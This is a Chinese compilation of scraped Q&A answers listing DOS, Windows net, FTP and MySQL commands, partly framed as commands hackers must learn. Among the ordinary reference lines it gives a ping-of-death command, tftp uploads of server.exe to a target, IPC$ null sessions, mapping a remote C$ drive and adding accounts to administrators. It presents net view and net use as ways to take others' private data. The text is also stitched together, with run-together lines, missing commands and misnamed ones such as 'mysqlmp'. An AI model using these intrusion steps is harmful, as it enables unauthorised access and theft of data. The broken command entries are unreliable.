ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為:EntSky )regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;regedit /e 注冊表文件名 導出注冊表
REM 文本內容 在批處理文件中添加註解
ren 原文件名 新文件名 重命名文件名
replace 源文件 要替換文件的目錄 替換文件route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway addres,介面地址Interfaceset 指定環境變數名稱=要指派給變數的字元 設置環境變數set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令shutdown相關命令:
-s:表示關閉本地計算機
-a:表示取消關機操作
-f:強行關閉應用程序
-m:計算機名:控制遠程計算機
-i:顯示圖形用戶界面,但必須是shutdown的第一個選項-l:注銷當前用戶
-r:關機並重啟
-t:時間:設置關機倒計時
-c:「消息內容」:輸入關機對話框中的'消息taskmgr 調出任務管理器
telnet 在本機上直接鍵入telnet 將進入本機的telnettelnet ip 埠 遠和登陸伺服器,默認埠為23title 標題名字 更改CMD窗口標題名字
tftp -i 自己IP(用目標機器作跳板時這用目標機器IP) get server.exe c:server.exe 登陸後,將「IP」的server.exe下載到目標主機c:server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送tftp -i 對方IP put c:server.exe 登陸後,上傳本地c:server.exe至主機tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其它任何埠trAcert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱type 文件名 顯示文本文件的內容
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)IIS服務命令:
iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現)iisreset /start或stop 啟動(停止)所有Internet服務iisreset /restart 停止然後重新啟動所有Internet服務iisreset /status 顯示所有Internet服務狀態iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
FTP常用命令:
ftp的命令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。
-d 使用調試方式。
-n 限制ftp的自動登錄,即不使用。netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式。
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中mget [remote-files] 從遠端主機接收一批文件至本地主機mput local-files 將本地主機中一批文件傳送至遠端主機dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件。如果有本地文件,就將結果寫至本地文件ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)open host[port] 建立指定ftp伺服器連接,可指定連接埠 刪除遠端主機中的文件
m [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄rename [from] [to] 改變遠端主機中的文件名rmdir directory-name 刪除遠端主機中的目錄status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母cd remote-dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zipMYSQL 命令:
mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456註:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼grant select on 資料庫。* to 用戶名@登錄主機 identified by 「密碼」; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分號作為命令結束符)show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。
use mysql;
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (欄位設定列表); 建表drop database 庫名;
表名; 刪庫和刪表
from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp –opt school>school.bbb 備份資料庫:(命令在DOS的mysqlin目錄下執行);注釋:將資料庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取。
⑸ 求在DOS下常用的網路命令
黑客必學DOS命令
一、ping命令
在Windows的控制窗口中(Windows 95/98/ME的command解釋器、Windows NT/2000的cmd解釋器),運行ping可以看到這個命令的說明,它是一個探測本地電腦和遠程電腦之間信息傳送速度的命令,這個命令需要TCP/IP協議的支持,ping將會計算一條信息從本地發送到遠程再返回所需要的時間,黑客使用這個命令決定是否對伺服器進行攻擊,因為連接速度過慢會浪費時間、花費過多的上網費用。
另外這個命令還可以透過域名找到對方伺服器的IP地址,我們知道域名只是提供給瀏覽網頁用的,當我們看到一個不錯的域名地址後,要想通過telnet連接它,就必須知道對方的IP地址,這里也要使用ping命令的。
這個命令的基本使用格式可以通過直接運行ping獲得,現在假設目標是http://www.abc.com/,則可以在控制台下輸入ping www.abc.com,經過等待會得到如下信息:
Pinging www.abc.com [204.202.136.32] with 32 bytes of data:
Reply from 204.202.136.32: bytes=32 time=302ms TTL=240
Reply from 204.202.136.32: bytes=32 time=357ms TTL=240
Reply from 204.202.136.32: bytes=32 time=288ms TTL=240
Reply from 204.202.136.32: bytes=32 time=274ms TTL=240
Ping statistics for 204.202.136.32:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 274ms, Maximum = 357ms, Average = 305ms
這些信息的意思是:www.abc.com的IP地址是204.202.136.32,對他發送了四次數據包,數據包的大小是32位元組,每一次返回的時間分別是302ms、357ms、288ms、274ms。綜合看,發送了四個數據包全部返回,最小時間是274ms,最大時間357ms,他們的平均時間是305ms。
這樣黑客就了解了連接對方伺服器使用的時間。另外這個命令還有一些特殊的用法,例如可以通過IP地址反查伺服器的NetBIOS名,現在以211.100.8.87為例,使用ping配合「-a」,在控制台下輸入命令ping -a 211.100.8.87,它的返回結果是:
Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data:
Reply from 211.100.8.87: bytes=32 time=96ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=109ms TTL=120
Ping statistics for 211.100.8.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 96ms, Maximum = 110ms, Average = 106ms
從這個結果會知道伺服器的NetBIOS名稱是POPNET-FBZ9JDFV。另外在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,例如上面的www.abc.com返回的TTL是240,對方的系統很可能是Linux,而第二個目標的TTL是120,那麼說明它使用的系統也許是Windows。
另外ping還有很多靈活的應用,我不在這里過多的介紹,讀者請另行查閱此命令相關幫助文件。
二、net命令:
NET命令是很多網路命令的集合,在Windows ME/NT/2000內,很多網路功能都是以net命令為開始的,通過net help可以看到這些命令的詳細介紹:
NET CONFIG 顯示系統網路設置
NET DIAG 運行MS的DIAGNOSTICS程序顯示網路的DIAGNOSTIC信息
NET HELP 顯示幫助信息
NET INIT 不通過綁定來載入協議或網卡驅動
NET LOGOFF 斷開連接的共享資源
NET LOGON 在WORKGROUP中登陸
NET PASSWORD 改變系統登陸密碼
NET PRINT 顯示或控制列印作業及列印隊列
NET START 啟動服務,或顯示已啟動服務的列表
NET STOP 停止網路服務
NET TIME 使計算機的時鍾與另一台計算機或域的時間同步
NET USE 連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息
NET VER 顯示區域網內正在使用的網路連接類型和信息
NET VIEW 顯示域列表、計算機列表或指定計算機的共享資源列表
這些命令在Win95/98中支持的比較少,只有幾個基本常見的,而在NT或者2000中又元元多於上面的介紹,不過大多數對於初學者也沒有必要掌握,所以我選擇了WindowsME進行介紹,其中最常用到的是NET VIEW和NET USE,通過者兩個命令,學習者可以連接網路上開放了遠程共享的系統,並且獲得資料。這種遠程共享本來是為便捷操作設計的,但是很多網路管理員忽視了它的安全性,所以造成了很多不應該共享的信息的暴露,對於學習者來說,則可以輕易獲得它人電腦上的隱私資料。
例如在控制台下輸入net view \\202.96.50.24則可以獲得對應IP的系統共享目錄,進而找到他們的共享文件,當然這需要202.96.50.24系統的確存在共享目錄,具體如何找到這些存在共享的系統,我將會在後面的文章中進行介紹。
三、telnet和ftp命令:
這兩個命令分別可以遠程對系統進行telnet登陸和ftp登陸,兩種登陸使用的不同的協議,分別屬於兩種不同的網路服務,ftp是遠程文件共享服務,也就是說學習者可以將自己的資料上傳、下載,但是它並沒有過多的權利,無法在遠程電腦上執行上傳的文件;而telnet則屬於遠程登陸服務,也就是說可以登陸到遠程系統上,並獲得一個解釋器許可權,擁有解釋器就意味著擁有了一定的許可權,這種許可權可能是基本的文件操作、也可能是可以控制系統的管理員許可權。
四、netstat命令:
這個程序有助於我們了解網路的整體使用情況。它可以顯示當前正在活動的網路連接的詳細信息,如採用的協議類型、當前主機與遠端相連主機(一個或多個)的IP地址以及它們之間的連接狀態等。 使用netstat ?可以顯示它的命令格式和參數說明:
netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的參數說明如下:
-a 顯示所有主機的埠號;
-e 顯示乙太網統計信息;
-n 以數字表格形式顯示地址和埠;
-p proto 顯示特定的協議的具體使用信息;
-r 顯示本機路由表的內容;
-s 顯示每個協議的使用狀態(包括TCP、UDP、IP);
interval 重新顯示所選的狀態,每次顯示之間的間隔數(單位秒)。
netstat命令的主要用途是檢測本地系統開放的埠,這樣做可以了解自己的系統開放了什麼服務、還可以初步推斷系統是否存在木馬,因為常見的網路服務開放的默認埠輕易不會被木馬佔用,例如:用於FTP(文件傳輸協議)的埠是21;用於TELNET(遠程登錄協議)的埠是23;用於SMTP(郵件傳輸協議)的埠是25;用於DNS(域名服務,即域名與IP之間的轉換)的埠是53;用於HTTP(超文本傳輸協議)的埠是80;用於POP3(電子郵件的一種接收協議)的埠是110;WINDOWS中開放的埠是139,除此以外,如果系統中還有其他陌生的到口,就可能是木馬程序使用的了。通過netstat或者netstat -a可以觀察開放的埠,如果發現下面的埠,就說明已經有木馬程序在系統中存在:
31337號埠是BackOffice木馬的默認埠;1999是Yai木馬程序;2140或者3150都是DEEP THROAT木馬使用的埠;還有NETBUS、冰河或者SUB7等木馬程序都可以自定義埠,因此發現了陌生埠一定要提高警惕,使用防火牆或者查病毒軟體進行檢測。
五、tracert命令:
這個命令的功能是判定數據包到達目的主機所經過的路徑、顯示數據包經過的中繼節點清單和到達時間。tracert命令的格式如下:
tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
命令行中的參數-d是要求tracert不對主機名進行解析,-h是指定搜索到目的地址的最大輪數,-j的功能是沿著主機列表釋放源路由,-w用來設置超時時間間隔。
通過tracert可以判斷一個伺服器是屬於國內還是國際(網路伺服器的物理未知不能依靠域名進行判斷),根據路由路經可以判斷信息從自己的系統發送到網路上,先後經過了哪些IP到大對方伺服器,這就好像乘公共汽車的時候從起點出發到達終點站的時候,中途會出現很多路牌一個道理,我們清楚了自己的信息的傳送路徑,才能夠更清晰的了解網路、對伺服器進行攻擊。
六、winipcfg:
winipcfg和ipconfig都是用來顯示主機內IP協議的配置信息。只是winipcfg適用於Windows 95/98,而ipconfig適用於Windows NT。winipcfg不使用參數,直接運行它,它就會採用Windows窗口的形式顯示具體信息。這些信息包括:網路適配器的物理地址、主機的IP地址、子網掩碼以及默認網關等,點擊其中的「其他信息」,還可以查看主機的相關信息如:主機名、DNS伺服器、節點類型等。其中網路適配器的物理地址在檢測網路錯誤時非常有用。
ipconfig的命令格式如下:ipconfig [/? | /all | /release [adapter] | /renew [adapter]]
其中的參數說明如下:
使用不帶參數的ipconfig命令可以得到以下信息:IP地址、子網掩碼、默認網關。而使用ipconfig
/? 顯示ipconfig的格式和參數的英文說明;
/all 顯示所有的配置信息;
/release 為指定的適配器(或全部適配器)釋放IP地址(只適用於DHCP);
/renew 為指定的適配器(或全部適配器)更新IP地址(只適用於DHCP)。
/all,則可以得到更多的信息:主機名、DNS伺服器、節點類型、網路適配器的物理地址、主機的IP地址、子網掩碼以及默認網關等。
⑹ dos命令大全及用法
dos命令大全及用法如下:
1、PING。PING命令是我們用來檢查我們網路是不是連接,以及網路連接的速度是多少的命令。PING命令所根據的就是,我們的每一台電腦都有唯一的一個ip地址,我們使用這個ip然後給一個目標ip發送一個數據包,我們查看ping命令的一些參數和用法我們可以在dos窗戶輸入ping/?然後回車就可以了。
2、NBTSTAT。NBTSTAT命令主要的用於就是查看我們電腦的mac地址以及我們電腦的NetBIOS信息,而且NBTSTAT命令還可以為我們消除NetBIOS高速緩存器,還可以加在LMHOSTS文件。這個命令在我們進行一些安全檢查的時候是非常重要的,是使用比較多的,我們查看它的用法和參數,在dos窗口輸入nbtstat/?然後回車就可以了。
3、NETSTAT。如果我們想查看我們電腦和ip、tcp還有icmp等等的一些協議的統計數據,我們就可以使用NETSTAT命令,NETSTAT命令的主要作用就是檢查我們點奧各個埠的網路連接的情況。查看NETSTAT命令的參數和用法在dos窗口輸入netstat/?。
4、TRACERT。如果想確定我們本機的一些ip數據的訪問目標,我們可以使用TRACERT命令,TRACERT命令就是一個路由跟蹤的程序。TRACERT命令可以生成一定的數據然後確定我們本機到其他網路上的路徑。顯示TRACERT命令的方法是在dos窗口輸入tracert/?。
5、NET。如果說哪些命令是dos命中比較重要的,那一定有net命令,而且net命令的每一個子命令都很重要,一定要都了解,而且能熟練地使用,net命令的功能非常強大,是我們最好的入侵工具,常看net命令的參數和用法在dos窗口輸入net/?。
⑺ 網路dos命令
常用網路DOS命令
fport 查看系統埠和埠上運行的程序
netstat -an 查看所有連接本機IP
ipconfig /all 查看所有連接本機IP
telnet IP 埠 連接對方機器某個埠
net user 查看本機用戶
net user 用戶名 密碼 /add 建立一個用戶
net user 用戶名 /del 刪除一個用戶
net localgroup administrators 用戶名 /add 把用戶添加到管理員
net localgroup administrators 用戶名 /del 把用戶從管理員組刪除
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user guest /active:yes 激活guest用戶
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
⑻ net命令的使用,詳細點,
這篇文章綜合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三個操作系統關於NET命令的解釋,希望可以全面一些
先說一些:
(1)NET命令是一個命令行命令。
(2)管理網路環境、服務、用戶、登陸。。。。等本地信息
(3)WIN 98,WIN WORKSTATION和WIN NT都內置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)獲得HELP
(1)在NT下可以用圖形的方式,開始-》幫助-》索引-》輸入NET
(2)在COMMAND下可以用字元方式,NET /?或NET或NET HELP得到一些方法,相應的方法的幫助NET COMMAND /HELP或NET HELP COMMAND或NET COMMAND /? 另對於錯誤NET HELPMSG MESSAGE#是4位數
(7)強制參數
所有net命令接受選項/yes和/no(可縮寫為/y和/n)。〔簡單的說就是預先給系統的提問一個答案〕
(8)有一些命令是馬上產生作用並永久保存的,使用的時候要慎重
(9)對於NET命令的功能都可以找到相應的圖形工具的解決方案
(10)命令的組成
命令 參數 選項 | 參數 選項 | 參數 選項 |。。。。。。
瘰癧羅嗦說了一大堆,其實就是6和7有用,呵呵
另有兩件事:
(1)在NT的NET命令中有一些參數是只有在SERVER環境中才能使用的
(2)在WIN98的NET命令中有一些參數不能在DOS-WIN中使用,只能在DOS環境中使用
下面對NET命令的不同參數的基本用法做一些初步的介紹:
(1)NET VIEW
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view 〔computername | /domain〔:domainname〕〕
參數介紹:(1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)computername 指定要查看其共享資源的計算機。
(3)/domain〔:domainname〕指定要查看其可用計算機的域。
簡單事例:(1)net view YFANG查看YFANG的共享資源列表。
(2)net view /domain:LOVE查看LOVE域中的機器列表。
(2)NET USER
作用:添加或更改用戶帳號或顯示用戶帳號信息。該命令也可以寫為 net users。
命令格式:net user 〔username 〔password | *〕 〔options〕〕 〔/domain〕
參數介紹:(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
2)username添加、刪除、更改或查看用戶帳號名。
(3)password為用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
簡單事例:(1)net user yfang查看用戶YFANG的信息
(3)NET USE
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:net use 〔devicename | *〕 〔computernamesharename〔volume〕〕 〔password | *〕〕 〔/user:〔domainname〕username〕 〔〔/delete〕 | 〔/persistent:{yes | no}〕〕
參數介紹:
鍵入不帶參數的net use列出網路連接。
devicename指定要連接到的資源名稱或要斷開的設備名稱。
computernamesharename伺服器及共享資源的名稱。
password訪問共享資源的密碼。
*提示鍵入密碼。
/user指定進行連接的另外一個用戶。
domainname指定另一個域。
username指定登錄的用戶名。
/home將用戶連接到其宿主目錄。
/delete取消指定網路連接。
/persistent控制永久網路連接的使用。
簡單事例:
(1)net use e: YFANGTEMP將YFANGTEMP目錄建立為E盤
(2)net use e: YFANGTEMP /delete斷開連接
(4)NET TIME
作 用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式:net time 〔computername | /domain〔:name〕〕 〔/set〕
參數介紹:
(1)computername要檢查或同步的伺服器名。
(6)Net Pause
作 用:暫停正在運行的服務。
命令格式:net pause service
(7)Net Continue
作 用:重新激活掛起的服務。
命令格式:net continue service
(8)NET STOP
作 用:停止 Windows NT 網路服務。
命令格式:net stop service
參數介紹:我們來看看這些服務都是什麼
(1)alerter(警報)
(2)client service for netware(Netware 客戶端服務)
(3)clipbook server(剪貼簿伺服器)
(4)computer browser(計算機瀏覽器)
(5)directory replicator(目錄復制器)
(6)ftp publishing service (ftp )(ftp 發行服務)
(7)lpdsvc
(8)net logon(網路登錄)
(9)network dde(網路 dde)
(10)network dde dsdm(網路 dde dsdm)
(11)network monitor agent(網路監控代理)
(12)nt lm security support provider(NT LM 安全性支持提供)
(13)ole(對象鏈接與嵌入)
(14)remote access connection manager(遠程訪問連接管理器)
(15)remote access isnsap service(遠程訪問 isnsap 服務)
(16)remote access server(遠程訪問伺服器)
(17)remote procere call (rpc) locator(遠程過程調用定位器)
(18)remote procere call (rpc) service(遠程過程調用服務)
(19)schele(調度)
(20)server(伺服器)
(21)simple tcp/ip services(簡單 TCP/IP 服務)
(22)snmp
(23)spooler(後台列印程序)
(24)tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
(25)ups
26)workstation(工作站)
(27)messenger(信使)
(28)dhcp client
(29)eventlog
以下這些SERVICE只能在NT SERVER上使用
(1)file server for macintosh
(2)gateway service for netware
(3)microsoft dhcp server
(4)print server for macintosh
(5)remoteboot
(6)windows internet name service
(9)Net Statistics
作 用:顯示本地工作站或伺服器服務的統計記錄。
命令格式:net statistics 〔workstation | server〕
參數介紹:(1)鍵入不帶參數的net
statistics列出其統計信息可用的運行服務。
(2)workstation顯示本地工作站服務的統計信息。
(3)server顯示本地伺服器服務的統計信息。
簡單事例:(1)net statistics server | more顯示伺服器服務的統計信息
(10)Net Share
作 用:創建、刪除或顯示共享資源。
命令格式:net share sharename=drive:path 〔/users:number | /unlimited〕 〔/remark:text〕
參數介紹:(1)鍵入不帶參數的net
share顯示本地計算機上所有共享資源的信息。
(2)sharename是共享資源的網路名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6)/remark:text 添加關於資源的注釋,注釋文字用引號引住。
簡單事例:(1)net share mylove=c:temp /remark:my first
share以mylove為共享名共享C:temp
(2)net share mylove /delete停止共享mylove目錄
11)Net Session
作 用:列出或斷開本地計算機和與之連接的客戶端的會話,也可以寫為net sessions或net sess。
命令格式:net session 〔computername〕 〔/delete〕
參數介紹:(1)鍵入不帶參數的net
session顯示所有與本地計算機的會話的信息。
(2)computername標識要列出或斷開會話的計算機。
(3)/delete結束與computername計算機會話並關閉本次會話期間計算機的所有進程。
簡單事例:(1)net session YFANG要顯示計算機名為YFANG的客戶端會話信息列表。
(12)Net Send
作 用:向網路的其他用戶、計算機或通信名發送消息。
命令格式:net send {name | * | /domain〔:name〕 | /users} message
參數介紹:(1)name要接收發送消息的用戶名、計算機名或通信名。
(2)*將消息發送到組中所有名稱。
(3)/domain〔:name〕將消息發送到計算機域中的所有名稱。
(4)/users將消息發送到與伺服器連接的所有用戶。
(5)message作為消息發送的文本。
簡單事例:(1)net send /users server will shutdown in 5 minutes.給所有連接到伺服器的用戶發送消息
(13)Net Print
作 用:顯示或控制列印作業及列印隊列。
命令格式:net print 〔computername 〕 job# 〔/hold | /release | /delete〕
參數介紹:(1)computername共享列印機隊列的計算機名。
(2)sharename列印隊列名稱。
(3)job#在列印機隊列中分配給列印作業的標識號。
(4)/hold使用 job# 時,在列印機隊列中使列印作業等待。
(5)/release釋放保留的列印作業。
(6)/delete從列印機隊列中刪除列印作業。
單事例:(1)net print YFANGSEEME列出YFANG計算機上SEEME列印機隊列的目錄
(14)Net Name
作 用:添加或刪除消息名(有時也稱別名),或顯示計算機接收消息的名稱列表。
命令格式:net name 〔name 〔/add | /delete〕〕
參數介紹:(1)鍵入不帶參數的net name列出當前使用的名稱。
(2)name指定接收消息的名稱。
(3)/add將名稱添加到計算機中。
(4)/delete從計算機中刪除名稱。
(15)Net Localgroup
作 用:添加、顯示或更改本地組。
命令格式:net localgroup groupname {/add 〔/comment:text 〕 | /delete} 〔/domain〕
參數介紹:(1)鍵入不帶參數的net
localgroup顯示伺服器名稱和計算機的本地組名稱。
(2)groupname要添加、擴充或刪除的本地組名稱。
(3)/comment: text 為新建或現有組添加註釋。
(4)/domain在當前域的主域控制器中執行操作,否則僅在本地計算機上執行操作?
(5)name 〔 ...〕列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組名。
(6)/add將全局組名或用戶名添加到本地組中。
(7)/delete從本地組中刪除組名或用戶名。
簡單事例:(1)net localgroup love /add將名為love的本地組添加到本地用戶帳號資料庫
(2)net localgroup love顯示love本地組中的用戶
(16)Net Group
作 用:在 Windows NT Server 域中添加、顯示或更改全局組。
命令格式:net group groupname {/add 〔/comment:text 〕 | /delete} 〔/domain〕
參數介紹:(1)鍵入不帶參數的net group顯示伺服器名稱及伺服器的組名稱。
(2)groupname要添加、擴展或刪除的組。
(3)/comment:text 為新建組或現有組添加註釋。
(4)/domain在當前域的主域控制器中執行該操作,否則在本地計算機上執行操作? ?
(5)username〔 ...〕列表顯示要添加到組或從組中刪除的一個或多個用戶。
(6)/add添加組或在組中添加用戶名。
(7)/delete刪除組或從組中刪除用戶名。
簡單事例:(1)net group love yfang1 yfang2 /add將現有用戶帳號yfang1和yfang2添加到本地計算機的love組
(17)Net File
作 用:顯示某伺服器上所有打開的共享文件名及鎖定文件數。
命令格式:net file 〔id 〔/close〕〕
參數介紹:(1)鍵入不帶參數的net file獲得伺服器上打開文件的列表。
(2)id文件標識號。
(3)/close關閉打開的文件並釋放鎖定記錄。
(18)Net Config
作 用:顯示當前運行的可配置服務,或顯示並更改某項服務的設置。
命令格式:net config 〔service 〔options〕〕
參數介紹:(1)鍵入不帶參數的net config顯示可配置服務的列表。
(2)service通過net config命令進行配置的服務(server或workstation)
(3)options服務的特定選項。
(19)Net Computer
作 用:從域資料庫中添加或刪除計算機。
命令格式:net computer computername {/add | / del}
參數介紹:(1)computername指定要添加到域或從域中刪除的計算機。
(2)/add將指定計算機添加到域。
(3)/del將指定計算機從域中刪除。
簡單事例:(1)net computer cc /add將計算機 cc 添加到登錄域
(20)Net Accounts
作 用:更新用戶帳號資料庫、更改密碼及所有帳號的登錄要求。
命令格式:net accounts 〔/forcelogoff:{minutes | no}〕 〔/minpwlen:length〕 〔/maxpwage:{days | unlimited}〕 〔/minpwage:days〕 〔/uniquepw:number〕 〔/domain〕
參數介紹:(1)鍵入不帶參數的net
accounts顯示當前密碼設置、登錄時限及域信息。
(2)/forcelogoff:{minutes | no}設置當用戶帳號或有效登錄時間過期時
(3)/minpwlen:length設置用戶帳號密碼的最少字元數。
(4)/maxpwage:{days | unlimited}設置用戶帳號密碼有效的最大天數。
(5)/minpwage:days設置用戶必須保持原密碼的最小天數。
(6)/uniquepw:number要求用戶更改密碼時,必須在經過number次後才能重復使用 與之相同的密碼。
(7)/domain在當前域的主域控制器上執行該操作
8)/sync當用於主域控制器時,該命令使域中所有備份域控制器同步
簡單事例:(1)net accounts /minpwlen:7將用戶帳號密碼的最少字元數設置為7
----------------------上面介紹的是NET命令在WINNT下的基本用法
----------------------下面我們看看NET命令在WIN98下的基本用法
在WIN98中NET命令也有一些參數
其中有一些參數的名字和功能及簡單的使用方法和WINNT下的相應的參數的用法相? ?
其中有(1)NET TIME命令
(1)NET PRINT命令
(1)NET USE命令
(1)NET VIEW命令
在WIN98中NET命令有一些參數
其中有一些參數的名字和WINNT下的相應的參數的名字相同但其用法卻有些不同
其中有
(1)NET START
作 用:啟動相應的服務。(不能在DOS-WIN中用)
命令格式:NET START 〔BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK〕 〔/LIST〕 〔/YES〕 〔/VERBOSE〕
(2)NET STOP
作 用:停止相應的服務.(不能在DOS-WIN中用)
命令格式:NET STOP 〔BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK〕 〔/YES〕
在WIN98中NET命令還有一些參數是在98下才有的
其中有
(1)NET DIAG
作 用:運行MS的DIAGNOSTICS程序顯示網路的DIAGNOSTIC信息
命令格式:NET DIAGNOSTICS 〔/NAMES | /STATUS〕
(2)NET INIT
